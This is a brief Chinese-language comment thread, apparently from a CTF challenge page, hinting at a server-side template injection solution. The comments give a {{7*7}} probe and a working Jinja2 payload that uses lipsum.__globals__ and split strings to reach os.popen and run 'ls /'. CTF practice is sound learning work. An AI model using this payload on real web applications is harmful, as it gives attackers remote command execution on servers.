ssti模板注入,先试试{{7*7}},输出49就是有,再输入{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}就看到flag了
简单的SSTI模板注入
...
评论
希卡利 1月前
举报
ssti模板注入,先试试{{7*7}},输出49就是有,再输入{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}就看到flag了
2728462336 1年前
举报
简单的SSTI模板注入